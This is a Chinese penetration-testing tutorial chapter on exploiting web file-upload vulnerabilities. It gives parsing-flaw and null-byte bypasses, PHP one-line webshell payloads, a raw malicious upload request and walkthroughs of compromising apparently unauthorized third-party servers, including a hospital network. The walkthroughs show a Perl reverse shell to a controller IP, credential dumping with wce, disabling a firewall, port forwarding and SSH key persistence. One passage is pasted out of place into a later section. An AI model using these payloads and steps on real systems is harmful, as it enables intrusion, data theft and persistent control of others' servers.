Web服务器渗透实战：常见文件上传漏洞及利用

常见文件上传漏洞及利用第一节文件上传及解析漏洞第二节利用FCKeditor漏洞渗透某Linux服务器第三节eWebEditor漏洞渗透某网站第四节口令及上传文件获取某网站服务器权限第五节Dvbbs8.2插件上传漏洞利用第六节Openfire后台插件上传获取 Webshell第七节利用CFM上传漏洞渗透某服务器第八节通过修改IWMS后台系统设置获取Webshell第九节使用BurpSuite抓包上传Webshell第十节密码绕过获取某站点Webshell

第一节文件上传及解析漏洞

6.1.1文件上传的危害在Web渗透过程中，文件上传漏洞的危害是众所周知的，通过文件上传可以上传Webshell，进而可以控制服务器。6.1.2文件解析漏洞介绍文件解析漏洞主要是一些特殊文件被IIS、Apache、Nginx等服务在某种情况下解释成脚本文件格式并得以执行而产生的漏洞。6.1.3IIS5.x/6.0解析漏洞IIS6.0解析漏洞主要有以下三种：1．目录解析漏洞/xx.asp/xx.jpg在网站下创建文件夹名字为.asp、.asa的文件夹，其目录内的任何扩展名的文件都会被IIS当做asp文件来解析并执行。因此攻击者可以通过该漏洞直接上传图片木马，并且不需要改后缀名。2．文件解析xx.asp;.jpg在IIS6.0下，分号后面的扩展名不被解析，所以xx.asp;.jpg被解析为asp脚本得以执行。3．文件类型解析asa/cer/cdxIIS6.0默认的可执行文件除了asp文件还包含asa、cer、cdx这三种文件。6.1.4Apache解析漏洞Apache对文件的解析主要是从右到左开始判断并进行解析的，如果判断该文件为不能解析的类型，则继续向左进行解析，如xx.php.wer.xxxxx将被解析为PHP类型的文件。6.1.5IIS7.0/Nginx<8.03畸形解析漏洞在默认Fastcgi开启状况下上传名字为xx.jpg，内容如下：<?PHPfputs(fopen('shell.php','w'),'<?phpeval($_POST[cmd])?>');?>然后访问xx.jpg/.php，在这个目录下就会生成一句话木马shell.php。6.1.6Nginx<8.03空字节代码执行漏洞Nginx的0.5.,0.6.,0.7≤0.7.65版本和0.8≤0.8.37版本在使用PHP-Fastcgi执行php的时候，URL里面在遇到%00空字节时与Fastcgi处理不一致，可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码。另一种Nginx文件漏洞是从左到右进行解析的，既可绕过对后缀名的限制，又可上传木马文件，因此可以上传xxx.jpg.php(可能是运气的原因，也可能是代码本身存在的问题，但在其他都不能成功的条件下可以试试)。内容如下：Content-Disposition:form-data;name="userfiles";filename="XXX.jpg.php"6.1.7htaccess文件解析如果在Apache中.htaccess可被执行并上传，那么可以尝试在.htaccess中写入：<FilesMatch"shell.jpg">SetHandlerapplication/x-httpd-php</FilesMatch>然后再上传包含一句话木马代码的shell.jpg的文件，这样shell.jpg就可被解析为PHP文件了。6.1.8操作系统特性解析由于Windows系统会将文件后缀中的空格和点进行过滤，如果遇到黑名单校验，如不允许上传PHP文件，而系统又是Windows系统，那么可以上传xx.php或xx.php.，通过这种方式就可以绕过黑名单校验进行文件上传。6.1.9前端上传限制有的网站由于对文件上传只做前端的校验，导致攻击者可以轻易绕过校验，因为前端的一切限制都是不安全的。图6-1所示是一个对前端进行校验的一个上传测试点。这里通过开启BurpSuite进行抓包，但是一点击上传就会提示无法上传，而BurpSuite未抓到任何数据包，说明这是一个前端校验的上传，在这里通过禁用js来直接上传PHP的Webshell，也可以先将PHP的Webshell进行后缀名更改，如更改为jpg，然后上传，通过BurpSuite抓包后发往repeater中进行测试，如图6-2所示。此时再将上传的文件更改为原本的后缀名php，即可成功上传，如图6-3所示。6.1.10文件头欺骗漏洞在一句话木马前面加入GIF89a，然后将木马保存为图片格式，可以欺骗简单的WAF。6.1.11从左到右检测在上传文件的时候，也遇到过服务器是从左到右进行解析的漏洞，也就是说服务器只检查文件名的第一个后缀，如果满足验证要求即可成功上传。但是众所周知，只有最后一层的后缀才是有效的，如1.jpg.php，那么真正的后缀应该是php，根据这个漏洞可绕过相关验证上传Webshell。6.1.12filepath漏洞filepath漏洞一般用来突破服务器自动命名规则，有以下两种利用方式：(1)改变文件上传后路径(filepath)，可以结合目录解析漏洞，路径 /x.asp/。(2)直接改变文件名称(都是在filepath下进行修改)，路径 /x.asp;。第一种方式使用较多，图6-4所示是一个上传测试页面。使用BurpSuite进行抓包并发往Repeater，此时上传是不成功的，而请求的包头文件里面显示了上传后的目录，可在此目录下新增一个eth10.php的目录，然后将filename改为图片格式，如jpg，但是如果直接这样上传还是不成功，可以在新建的目录后面使用00截断来进行上传，如图6-6所示。用第二种方式可以在原目录下新建一个eth10.php文件，然后直接使用00截断，这样依旧可以上传php文件，因为上传是使用filepath以及filename来控制的，将这个文件加入filename白名单后就可以用filepath进行上传。上传方法和第一种一样，唯一的区别是在00截断前不加最后一个斜杠( / )。6.1.1300截断00截断有以下两种利用方式：(1)更改filename，如xx.php.jpg，在BurpSuite中将空格对应的hex20改为00。(2)更改filename，如xx.php%00.jpg，在BurpSuite中将 %00进行右键转换 -url-urldecoder。6.1.14filetype漏洞filetype漏洞主要是针对content-type字段，主要有两种利用方式：(1)先上传一个图片，然后将content-type:images/jpeg改为content-type:text/asp，然后对filename进行00截断，将图片内容替换为一句话木马。(2)直接使用BurpSuite抓包，得到Post上传数据后，将Content-Type:text/plain改成

Content-Type:image/gif。6.1.15iconv函数限制上传如果某天发现无论上传什么文件，上传后的文件都会自动添加一个 .jpg后缀，那么可以怀疑是否是使用iconv这个函数进行了上传的限制。此时可以使用类似00截断的方法，但这时使用的不是00截断，而是80-EF截断，也就是说可以修改HEX为80到EF中的值来进行截断，如上传一个xx.php，然后截断抓包将后面的空格对应的十六进制改为80到EF中的任意一个。6.1.16双文件上传在文件上传的地方，右键点击审查元素，首先修改action为完整路径，然后复制粘贴上传浏览文件(<input)，这样就会出现两个上传框，第一个上传正常文件，第二个选择一句话木马，然后提交。6.1.17表单提交按钮有时扫描上传路径会发现只有一个浏览文件页面，却没有提交按钮，此时就需要写入提交按钮。写入表单：使用快捷键F12审查元素，在选择文件表单下面添加提交按钮代码，代码如下：<inputtype="submit"value="提交"name="xx">

第二节利用FCKeditor漏洞渗透某Linux服务器6.2.1对已有Webshell进行分析和研究1.搜索Webshell关键字Jsp的Webshell主要有JShell、JFold和JspFilebrowser三种，除此之外还有单独所谓的“CMD”型的JSP后门，它的主要功能是执行类似CMD的命令。我们利用Google搜索“阿呆JSPWebshell”时出来一个网页，如图6-7所示，根据经验我们可以知道第一条搜索记录就是一个Webshell地址。2.验证Webshell直接打开第一条搜索记录，获取真实的网站地址：/ UserFiles/ Image/IMG20090817235411840.jsp”打开该地址后能够正常运行，如图6-8所示，可以尝试输入一些常见的通用密码进行登录，但未能成功，说明该Webshell使用的是自己的密码。3.分析Webshell打开一个Webshell后我们的第一感觉是该网站肯定存在漏洞，入侵者有可能修复过也可能未修复漏洞，从地址来看该网站使用的很像是FCKeditor，我们可以直接在网站地址后加上“FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector= connectors/jsp/connector”并跳转前往，如图6-9所示，直接打开了熟悉的FCKeditor上传页面。4.上传Webshell在FCKeditor中单击浏览按钮直接选择一个Jsp的Webshell文件，然后单击“Upload”上传，如图6-11所示，上传成功。6.2.2测试上传的Webshell由于FCKeditor的典型目录结构为“UserFiles/Image/”，因此上传的Webshell地址可以使用“UserFiles/Image(File或Flash)/+文件名称”，在本例中是上传到Flash文件目录，因此实际地址为“/UserFiles/Flash/Browser.jsp”，如图6-12所示，Webshell能够正常运行，此时就可以利用Webshell进行下载、上传、删除、复制以及执行命令等操作。6.2.3对Webshell所在服务器进行信息收集与分析1．获取服务器类型在获取Webshell后可以通过它来执行命令，查看服务器的配置情况，如图6-13所示，通过浏览文件目录可以知道该服务器为Linux服务器。2．下载网站源代码与数据通过渗透能够快速提高个人攻防能力，在渗透成功后下载网站源代码与数据到本地进行分析，取长补短学习他人长处，快速积累经验。在本例中通过查看该服务器下的“var/mysqlbak”目录，获取了该网站的数据库MySQL备份文件，如图6-14所示，通过Webshell可以下载单独的文件，也可以打包下载整个网站的文件。3．获取他人的Webshell密码他人的Webshell是本次渗透的目标，通过Webshell的地址去反过来查看文件的实际地址，使用cat命令查看其登录密码：cathome/webhome// WEB-INF/ webapps/ ROOT/UserFiles/Image/ IMG200908jsp如图6-15所示，获取其密码为“191903***”。6.2.4服务器提权1．查看Linux版本在Webshell中直接执行“uname-a”命令来查看Linux版本，结果显示为“Linux.tw2.6.9-11.ELsmp#1SMPFriMay2018:26:27EDT2005i686i686i386GNU/Linux”，如图6-16所示。2．查看操作系统发行版本“cat/etc/issue”命令主要用来显示操作系统发行版本等信息，用户可以定制issue，也就是说可以手动修改，如果未修改则默认显示各个操作系统发行版本的信息，如图6-17所示。3．反弹回shell将反弹脚本c.pl上传到路径“/var/tmp”，然后在控守计算机上执行“nc-vv-l-p53”，然后再在该Webshell中执行“perl/var/tmp/c.pl202.102.xxx.xxx53”，如图6-18所示。4．尝试提权通过Webshell上传最新的sendpage3漏洞利用程序，上传成功后，在反弹的shell中查看上传的程序，然后直接执行“./run”命令，如图6-20所示，直接提权为Root用户权限。6.2.5FCKeditor编辑器漏洞总结本案例通过FCKeditor漏洞成功获取Webshell后，通过查看Linux版本和操作系统的发行版本等信息，上传相应的漏洞利用程序，通过在反弹的终端执行exploit而获得系统的最高权限。1. FCKeditor重要信息收集(1) FCKeditor编辑器页：FCKeditor/_samples/default.html(2)查看编辑器版本：FCKeditor/_whatsnew.html(3)查看文件上传路径：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/2. FCKeditor被动限制策略所导致的过滤不严问题3.利用Windows2003路径解析漏洞上传网页木马4．FCKeditorPHP上传任意文件漏洞5．Type自定义参数变量任意上传文件漏洞6. aspx版FCKeditor新闻组件遍历目录漏洞7. FCKeditor中Webshell其他的上传方式8. FCKeditor文件上传“.”变“_”的绕过方法9.“.htaccess”文件图片上传

第三节eWebEditor漏洞渗透某网站6.3.1基本信息收集及获取后台管理权限1. eWebEditor重要信息(1)默认后台地址：/ewebeditor/admin_login.asp。(2)默认数据库路径：[PATH]/db/ewebeditor.mdb、[PATH]/db/db.mdb、[PATH] / db / %23ewebeditor.mdb。(3)使用默认账户和密码admin/admin888或admin/admin进入后台，也可尝试admin/123456，如果使用简单的账户和密码不行，可以尝试利用BurpSuite等工具进行密码暴力破解进入后台。(4)后台样式管理获取Webshell。(5)当数据库被管理员修改为asp或asa格式的时候，可以插入一句话木马服务端进入数据库，然后利用一句话木马客户端连接拿下Webshell。2.获取后台登录地址获取后台登录地址通常有三种方法。第一种是通过SQL注入等扫描工具进行扫描获取；第二种是根据个人经验进行猜测；第三种是特殊类型的后台地址，这种后台地址没有任何规律可循，怎么复杂就怎么构造，对这种网站可以通过旁注或者在同网段服务器，也可以通过系统设计的逻辑漏洞进行嗅探。在本例中通过测试获取后台地址为“http://034.748239.com/post/admin”，如图6-21所示，成功获取后台登录地址。3.进入后台使用账号“admin”，密码“admin888”进入后台，如图6-22所示。6.3.2漏洞分析及利用1.分析网站源代码(1)通过查看网站使用的模板以及样式表等特征信息，判断该网站使用了SouthidcEditor，并通过扫描获取了其详细的编辑器地址。(2)下载其默认的mdb数据库，并对其密码进行破解，获取其账号对应的密码，使用该密码进行登录，成功进入后台，如图6-23所示。2.对样式表进行修改单击“样式管理”，在其中新建一个样式名称“112”，并在允许上传文件类型及文件大小设置中添加“|asp|cer|asasp”类型，如图6-24所示。3.使用上传漏洞进行上传将以下代码保存为htm文件并打开，如图6-25所示，上传一个asp的木马文件。4.获取上传文件具体地址在管理菜单中单击“上传文件管理”，选择样式目录“112”，如图6-26所示6.3.3获取Webshell权限及信息扩展收集1.获取Webshell使用中国菜刀管理工具连接该Webshell地址，成功获取Webshell，如图6-27所示。2.信息扩展(1)获取QQ账号信息。(2)获取Ftp账号信息。(3)诈骗关键字。通过对网站代码进行分析，发现诈骗网站会在首页添加诸如“网上安全管理下载1”、“网上安全管理下载2”、“网上安全管理下载3”、“网上侦查系统”和“远程安全协助”等关键字，诱使用户下载“检察院安全管理软件.exe”、“检察院安全控件.exe”、“简易IIS服务器.exe”、“网络安全控件.zip”等远程控制软件，或者诱导用户访问指定的网站地址，对用户进行银行账号及密码的盗取，从而进行诈骗活动。(4)使用工具软件对正规网站进行镜像仿冒。6.3.4渗透及eWebEditor编辑器漏洞总结1．SouthidcEditor网站编辑器漏洞2．SouthidcEditor数据库下载地址3．eWebEditor遍历路径漏洞4．利用eWebEditorsession欺骗漏洞进入后台5．eWebEditor2.7.0注入漏洞6．eWebEditorv6.0.0上传漏洞7．eWebEditorPHP/ASP后台通杀漏洞8．eWebEditorNetupload.aspx上传漏洞

第四节口令及上传文件获取某网站

服务器权限6.4.1寻找后台地址思路在渗透过程中，通过扫描有可能未能发现前台存在SQL注入等漏洞，或者因为漏洞扫描软件本身的限制，未能扫描到网站所有的文件或找到的可利用的漏洞有限，这时就需要获取后台地址，通过后台来寻求突破，后台地址寻找思路如下：(1)默认后台地址。一般是网站名称 + 后台名称。(2)通过扫描器扫描获取后台地址。(3)网站直接提供后台地址。(4)专用系统的一些后台地址。(5)通过Google、百度等搜索引擎来搜索登录、系统管理等关键字来寻找后台地址。(6)某些PHP程序，其后台地址为index.php/Admin/Login/index.html。(7)从根目录admin.php/admin.aspx/admin.asp/admin.jsp直接进后台。(8)其他情况。6.4.2后台口令获取后台地址对于某些官方类的站点，先可以尝试admin/admin、admin/admin888、admin/123456等弱口令登录后台；如果在登录时没有提示输入验证码，则可以通过BurpSuite进行后台密码暴力破解。本次测试首先找到后台地址，如图6-30所示，然后使用弱口令admin/123456成功登录系统。6.4.3获取Webshell1.寻找上传地址成功登录后台后，寻找上传地址思路如下：(1)去查看文章发表及公告发布的地方，这些地方一定会存在编辑器。(2)去查看附件管理，比如Dedecms附件管理可以直接上传文件和编辑文件。(3)去查看附件上传的地方，有的网站有单独附件上传地点。(4)去查看网站轮换图片地址，有的网站有单独图片处理地址，可以在此上传文件。(5)去查看网站功能设置处，可以直接修改上传文件的类型，也可以添加网站支持的类型。在本例中有一个图片新闻，如图6-31所示，其中图片跟编辑器是分开的，这种情况极有可能可以直接上传脚本文件从而获取Webshell。也就是说这个地方可以进行构造和修改。2.直接上传文件测试单击选择文件，在其中直接选择一个PHP的Webshell，如图6-32所示，并进行上传，顺利上传后，右键单击获取图片的地址，或者查看源代码来获取Webshell的真实地址，如图6-33所示，成功获取Webshell。6.4.4服务器提权1.获取服务器密码通过Webshell的命令执行功能查看当前用户的权限，如图6-34所示，执行whoami命令后显示为system权限，说明PHP给的权限为系统权限，不用提权，可以通过上传wce等程序来获取当前登录用户的明文密码或者通过网站在线查询系统密码。上传wce32和wce64程序到C盘根目录，通过dirwce* 命令查看上传的文件是否存在及是否被系统杀毒软件查杀，然后执行wce32.rar-w命令，注意这里不是wce32.exe，可执行文件后缀虽然不是exe，但仍然当作exe来执行，顺利获取当前管理员密码“7788919aA”。2.成功登录服务器使用远程终端直接登录该服务器，如图6-36所示，成功登录，通过查看IP地址，发现该服务器配置有内网IP。6.4.5总结与思考(1)通过寻找文件上传模块，在该模块中可以先测试能否直接上传PHP的Webshell，在某些情况下，程序员未对上传文件进行检测，因此可以直接获取Webshell，这是文件上传漏洞中的一个特例。(2)后续在该网站又发现了目录信息泄露以及数据泄露，在存在漏洞的网站中发现漏洞后，漏洞就会越找越多。

第五节Dvbbs8.2插件上传漏洞利用6.5.1Dvbbs8.2插件上传漏洞利用研究1.使用Google搜索2.注册用户随机选取一个论坛，打开论坛后直奔注册页面，如图6-38所示，按照要求进行注册。3.修改样式使用注册好的用户登录论坛成功后，单击论坛工具栏上的“我的主页”，进入个人主页配置，然后点击“个人空间管理”标签，在基本设置中给现有的“空间标题”和“简介说明”随便起一个名字，如图6-39所示，然后点击“保存设置”按扭，接下来，单击“自定义风格”按钮，在“样式风格CSS修改”里任意输入几个字符，如图6-40所示，然后单击“保存设置”完成修改。4.无上传界面在“个人空间管理”中单击“自定义风格”，然后再单击“文件管理”按扭，接着就会弹出一个风格模板的文件管理新窗口了，如图6-41所示，然而在本次渗透中虽然出现了文件管理页面，但并未出现上传界面，说明管理员或者前期渗透人员删除了上传功能模块，只能放弃，重新再选择一个目标进行渗透。5.成功上传文件重新找了十多个论坛进行测试，终于测试成功了一个，如图6-42所示，选择一个一句话木马文件，将文件名称命名为“1.asp;1.jpg”，然后直接上传即可，上传成功后页面会自动刷新，如果无杀毒软件或者其他防范措施，一般都会出现刚才上传的一句话木马，且作为图片格式的木马不会显示出来。6.5.2获取Webshell1.使用一句话客户端进行连接使用lake2EvalClient进行连接，在“TheURL”中输入图片的详细地址，在“Password”中输入一句话木马的连接密码，在本例中密码是“cmd”，然后在“Function”(功能)中选择一个模块，如图6-43所示，单击“Send”，即可查看具体执行效果，显示磁盘情况如图6-44所示。2.获取网站的物理路径在功能模块中选择“ServerVariable”获取服务器和客户的一些基本信息，如图6-45所示，获取一句话木马的具体路径为“F:\www\\bbs\skins\myspace\userskins\skin_14\”；接着通过上传功能上传一个大马到服务器，输入密码后如图6-46所示。3.提权失败使用Serv-u以及FTP提权均告失败，后面对服务器端口进行扫描，发现服务器关闭了21端口和43958端口，如图6-47所示。4.查找并下载数据库在站点根目录中查找数据库配置脚本文件，如图6-48所示，本例中数据库配置连接文件为conn.asp，直接打开并获取数据库的相对路径“\database\unfgsa#szht.mdb”。由于在该数据库名称中使用了“#”号，因此使用浏览器下载的文件仅为1k，也就是说下载失败，对于这类文件有两个办法进行下载：(1)直接使用Webshell中的复制功能，将文件重新命名为可以下载的文件。(2)使用“%23”代替“#”进行下载，如图6-49所示，更换后可以将数据库文件下载到本地。6.5.3Dvbbs8.2渗透思路与防范措施1.渗透思路(1)下载Dvbbs8.2版本的database和boke的默认地址：data/Dvbbs8.mdb和boke/data/Dvboke.mdb。下载后通过查询破解16位的md5密码进入后台。(2)利用IIS图片上传漏洞，本节中的插件上传漏洞本质上属于IIS文件解析漏洞。(3)修改文件上传类型，使其支持服务器平台的脚本并上传。如果平台支持PHP/JSP/A，那么可以上传平台支持的木马，然后获取Webshell。2.防范措施(1) Dvbbs安装完毕后一定要修改默认数据库名称，同时去掉无用的txt文件和“PoweredByDvbbs8.2”标示。(2)后台密码设置强度高一些。即使下载了数据库，攻击者如果没有破解密码便无能为力。(3)谨慎使用插件和功能强大的模块，使用时尽量使用最小权限。(4)把上传图片的目录的脚本执行权限去掉，或者暂时将文件管理的上传模块去掉。(5)规范上传脚本的代码，校验上传图片和文件的代码段，或者在论坛后台把上传功能关闭。

第六节Openfire后台插件上传获取

 Webshell6.6.1选定攻击目标如果在实际网络扫描过程中发现存在Openfire便可以跳过下面的步骤，在进行渗透学习时可以利用fofa.so和Shadon等搜索引擎来排除或筛选目标IP等信息，以获取符合攻击特征的目标IP或站点。1.目标获取2.暴力破解或者使用弱口令登录系统一般的弱口令有admin/admin、admin/admin888、admin/123456，如果在尝试登录时这些弱口令无法登录请直接使用BurpSuite进行暴力破解进行登录。对于能够正常访问的网站，可以尝试登录，如图6-51所示，Openfire可能使用的不是默认端口。6.6.2获取后台权限输入正确密码后进入后台，如图6-52所示，可以查看服务器设置、用户/用户群、会话、分组聊天以及插件等信息。6.6.3上传插件并获取Webshell1.查看并上传插件单击插件，在其中可以看到所有的插件列表，在上传插件栏中单击上传插件，选择专门生成的带Webshell的Openfire插件，如图6-53所示。在本次测试中，从互联网收集了两个漏洞插件利用代码，如图6-54所示，均成功上传。2.获取Webshell(1) helloworld插件获取Webshell。单击服务器—服务器设置，如果上传helloworld插件并运行成功，在配置文件下面会生成一个用户接口设置链接，单击该链接即可获取Webshell，如图6-56所示。(2) broadcast插件获取Webshell。如图6-57和图6-58所示，获取broadcast的Webshell并查看当前用户权限为root。6.6.4免root密码登录服务器虽然通过Webshell可以获取/etc/shadow文件，但该root及其他用户的密码不是那么容易被破解的。我们可以在服务器上面用SSH来尝试能否利用公私钥来解决访问问题。1.在服务器上监听端口2.反弹shell到控守服务器3.实际操作流程(1)远程服务器生成公私钥。(2)本地Linux上生成公私钥。(3)将本地公钥上传到远程服务器上并生成authorized_keys。(4)删除多余文件。(5)登录服务器。使用命令“sshroot@1xx.1xx.111.1xx”登录服务器，不用输入远程服务器的密码也能达到完美登录服务器的目的，如图6-61所示。6.6.5总结与思考(1) Openfire需要获取管理员账号和密码，目前通杀所有版本。Openfire的最新版本为4.1.5。(2)可以通过BurpSuite对admin管理员账号进行暴力破解。(3)使用Openfire安全加固，可以使用强密码，同时严格设置插件权限，建议除了必需的插件目录外，禁用新创建目录。(4)使用本节所讲的方法，成功获取国内某著名医院网络的入口权限。

第七节利用CFM上传漏洞渗透某服务器6.7.1获取后台权限1.手工查找和自动扫描漏洞2.获取管理员用户名称和密码虽然获取的SQL注入漏洞无法利用pangolin进行渗透测试，但可以使用啊D注入工具对该注入点进行猜测，如图6-63所示，获取该数据库为“****_nqcontent”，用户名称为“nqcontent”，数据库权限为“db_owner”，根据SQL注入的一般步骤顺利地获取了有关管理员的用户名和密码。3.进入后台使用获取的用户名和密码成功登录系统，如图6-64所示，通过查看后台的各个功能模块，发现在“AssetManagement”中有上传(Upload)模块。6.7.2服务器提权1.获取Webshell通过测试了解到该上传模块允许上传CFM以及图片文件，上传一个CFM的命令并执行Webshell，如图6-65所示，上传后可以成功运行，且用户权限较高可以执行命令。2.关闭防火墙通过停用防火墙(netstopSharedaccess)或添加允许端口来绕过防火墙，如图6-66所示。3.成功登录3389在本地执行命令“lcx-listen33892008”，将3389端口重定向到本地的2008端口，运行mstsc后使用“:2008”进行连接，输入添加的管理员用户名和密码，成功进入系统，如图6-67所示。6.7.3内网渗透1.收集服务器信息通过查看发现服务器还支持PHP，通过CFM后门上传了一个PHP的Webshell，如图6-68所示，获取了该服务器的配置参数信息。通过Webshell获取了WordPress的数据库配置信息，再通过Webshell将WordPress的管理员数据库导出到本地，如图6-69所示。2.渗透Mail服务器6.7.4总结与思考(1)很多服务器都部署在虚拟机上面，渗透成功的也仅仅是虚拟机，虚拟机上的业务系统遭到破坏后可以快速恢复。由于硬件的支持，同一个硬件服务器可能部署了多个虚拟应用服务器。(2)针对CFM的渗透完全可以先使用Jsky进行扫描，找到漏洞后再通过啊D注入工具来猜测数据。CFM平台的渗透还可以通过手动方式来判断和猜测。(3) CFM平台上传CFM的Webshell后，其分配的权限很高，可以快速提权。(4)在具有一定权限的情况下可以使用命令“netstopsharedaccess”来停用Windows自带的防火墙，进而通过lcx转发端口来登录被渗透的内网服务器。

第八节通过修改IWMS后台系统6.8.1修改上传设置IWMS4.6未对文件上传类型进行限制，用户可以自定义上传类型。在系统设置中添加可上传文件类型aspx和asp，如图6-71所示。6.8.2获取Webshell1.测试上传单击“新闻管理”→“添加新闻”，在添加新闻页面中单击添加媒体，如图6-72所示，系统会自动出现上传功能。2.获取上传文件名称和路径如果上传成功，系统会自动给出文件上传的具体路径，如图6-74所示，本次上传的具体路径为“upload/2011_07/temp_11071410205449.aspx”。6.3.2漏洞分析及利用1.分析网站源代码(1)通过查看网站使用的模板以及样式表等特征信息，判断该网站使用了SouthidcEditor，并通过扫描获取了其详细的编辑器地址。(2)下载其默认的mdb数据库，并对其密码进行破解，获取其账号对应的密码，使用该密码进行登录，成功进入后台，如图6-23所示。3.获取Webshell在本例中上传的是aspx类型的一句话木马后门文件，使用中国菜刀打开该Webshell，如图6-76所示，可以很方便地对该网站进行各种文件操作等。4.上传大马进行管理使用一句话后门比较隐蔽，但操作起来不如大马方便，因此上传大马进行管理，如图6-77所示。6.8.3总结与思考(1) IWMS4.6以下版本均存在本节所提到的问题，通过修改上传类型可以顺利地获取Webshell。(2)文件上传获取Webshell的前提条件是获取管理员的密码，估计是因为这个原因导致官方一直未作修补。

第九节

使用BurpSuite抓包上传Webshel6.9.1环境准备(1)安装Java环境。(2)安装BurpSuite工具。6.9.2设置BurpSuite双击burpsuite.jar即可运行，首次运行时需要设置项目(project)，使用默认设置，单击“Next”→“StartBurp”运行BurpSuite主界面。1.设置Proxy在BurpSuite主界面中单击“Proxy”→“Options”，其中Interface默认为:8080，如图6-78所示。如果地址及端口已经存在，则不用设置，否则需要添加绑定端口Cinterface和地址。1.设置Proxy在BurpSuite主界面中单击“Proxy”→“Options”，其中Interface默认为:8080，如图6-78所示。如果地址及端口已经存在，则不用设置，否则需要添加绑定端口Cinterface和地址。2.设置代理(以IE为例)在浏览器中单击“工具”→“Internet选项”→“连接”→“局域网设置”，在代理服务器中填写地址，端口8080，如图6-79所示。6.9.3抓包并修改包文件内容1.执行文件上传再次打开目标网站并进入后台，找到文件上传处，单击”选择文件“选择预先设置好的图片(在图片中插入一句话木马，也可以通过copy/b1.aspx+1.jpgcmd.aspx;.jpg命令合成一张带一句话或者Webshell的后门图片)，如图6-80所示，选择图片后BurpSuite会进行拦截。2.放行抓包在BurpSuite中单击”Intercept“，可以看到抓包获取的信息，其中“Interceptison”表示BurpSuite正在进行拦截，单击“Forward”放行，单击“Drop”丢弃抓包内容。3.修改包内容右键找到Ctrl + R这个按钮，单击来到Repeater界面，在这个界面将完成包内容的修改工作，把aaa.jpg修改成aaa.asp(后面加上一个空格)，在Windows中文件名称后的空格将自动被忽略掉，如图6-82所示。4.提交修改包单击Hex在右侧编码区找到aaa.asp这段文字，一个空格的编码是(20)，我们修改成(00)然后点击Go，如果返回一段信息的话，就代表我们已经成功了。如果没有返回信息，请重新来一遍，或者去掉空格，如果不用空格，直接可以点击Go按钮发送，如果返回OK信息则表明修改包成功发送，如图6-84所示。6.9.4获取Webshell提交包到服务器后，在浏览器中会返回执行的结果，显示文件上传成功，通过查看文件来获取上传文件的地址，如图6-86所示成功获取Webshell。6.9.5BurpSuite截断上传总结1. BurpSuite重命名上传文件截断上传BurpSuite截断上传可以突破JavaScript本地检测，在抓包文件中直接将文件名进行替换，例如上传的文件aaa.jpg是JavaScript验证允许的，直接在BurpSuite中将jpg修改为asp就可以成功绕过。2. BurpSuite文件名后空格截断上传抓包后在filepath参数中将aaa.jpg修改为aaa.asp，需要通过hex将空格“20”改为空字符“00”。截断还有一种情况，就是修改文件名为aaa.asp□.jpg，但是这种情况比较少见。3. Content-type类型绕过如果上传脚本是通过检测的Content-type类型，原为Content-Type:text/plain，将文件类型修改为image/gif即可绕过，代码如下：<?phpif($_FILES['userfile']['type']!="image/gif"){ //检测Content-typeecho"Sorry,weonlyallowuploadingGIFimages";exit;}$uploaddir='uploads/';$uploadfile=$uploaddir.basename($_FILES['userfile']['name']);

if(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)){echo"Fileisvalid,andwassuccessfullyuploaded.\n";}else{echo"Fileuploadingfailed.\n";}?>可以在BurpSite中将Request包的Content-Type进行修改。POST/upload.phpHTTP/1.1TE:deflate,gzip;q=0.3Connection:TE,closeHost:localhostUser-Agent:libwww-perl/5.803Content-Type:multipart/form-data;boundary=xYzZYContent-Length:155--xYzZYContent-Disposition:form-data;name="userfile";filename="shell.php"Content-Type:image/gif(原为Content-Type:text/plain，此处修改为image/gif即可绕过)<?phpsystem($_GET['command']);?>--xYzZY--

第十节密码绕过获取某站点Webshell6.10